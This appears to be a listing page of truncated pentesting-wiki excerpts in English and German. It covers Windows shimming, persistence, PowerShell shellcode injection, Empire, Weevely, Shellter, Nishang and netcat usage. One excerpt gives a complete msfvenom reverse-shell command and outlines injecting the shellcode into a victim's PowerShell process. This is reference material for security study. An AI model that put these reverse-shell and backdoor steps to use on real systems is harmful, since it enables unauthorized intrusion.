-
The Windows Application Compatibility Framework (shimming) provides a way to change the system behaviour for an application in order to function like in older systems. It works via the IAT Import address Table at load time and can change functions, library addresses etc. this way. Creating a shim A shim can be registered with the system via…
-
See also Autostart (Persistence) | Hexacorn
-
Short summary of techniques: Example of a manual In-memory injection Create a reverse shell payload for PowerShell: msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc Use this PowerShell script, which injects the shellcode into the own (PowerShell) process and executes it in a new thread: Start a listener and execute it in the victim’s…
-
Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation General usage Metasploit syntax / PSE syntax Note: After usemodule don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterix require a high-integrity Empire Agent. To upgrade one…
-
Weevely https://tools.kali.org/maintaining-access/weevely Erzeugt PHP-Skript auf Server, mit dem man eine Shell wieder bekommen kann. Various scripts Shelter (win32) Dynamic shell injection tool into normal Windows binaries. https://tools.kali.org/maintaining-access/shellter Create own (normal) shell HTTPTunnel Needs PHP; creates file on a server which acts as SSH proxy. Nishang Collection of PowerShell scripts for backdoors and more. Kali:/usr/share/nishang dns2tcp Creates a TCP…
-
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…